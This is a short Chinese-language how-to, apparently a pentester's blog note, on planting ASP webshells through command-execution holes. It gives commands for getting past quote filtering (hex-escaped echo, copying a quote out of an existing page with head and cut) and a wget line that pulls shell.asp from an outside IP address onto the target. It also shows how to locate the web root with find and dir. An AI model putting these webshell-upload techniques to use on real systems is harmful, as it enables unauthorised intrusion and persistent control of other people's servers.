引号被过滤
今天命令执行,想要上传马,遇到了引号被过滤掉的问题。最终找到了三种方式来解决。
用echo -e 对它16进制编码
1
echo -e "\x22hello\x22" >> a.asp
因为它本身的asp里面有引号,我通过它仅有的命令head和cut,把它摘到了我的上传文件中
1
head -n 1 home.asp | cut -c 23 >> a.asp
因为有个别的案例,它有wget命令,我就用它下载匿名服务器里的asp马进去了。
1
wget http://5.188.230.77/ps/shell.asp
不知道 WEB 路径在哪里
还遇到一些小问题。比如不知道web的路径在哪里,如果可以命令执行的话,就find访问的首页。
1 | find / -name home.asp |
这个返回路径,就是web的文件路径了。写入的时候,写进去这个web路径,但是GET访问的时候,直接根目录的去访问它。(因为相对路径的设置原因)也不一定是根目录,从命令执行的漏洞点进去之后,看自己的当前路径。当前路径在哪里,get就访问哪里
echo 用法问题
写入文件的时候,为了避免换行,可以用以下方式写入
1 | echo -n "hello">a.txt |
追加写入
1 | echo -n "hello">>a.txt |
找绝对路径
windows
可以挨个换盘符,实现全局搜索的目的
1 | dir D:\*url.md* /s /b |
POC 验证
POC验证的时候,执行命令,用echo字符串的方式来进行验证。或者可以用md5(1)这种方式来验证。但是因为有的系统没有md5.所以推荐用echo
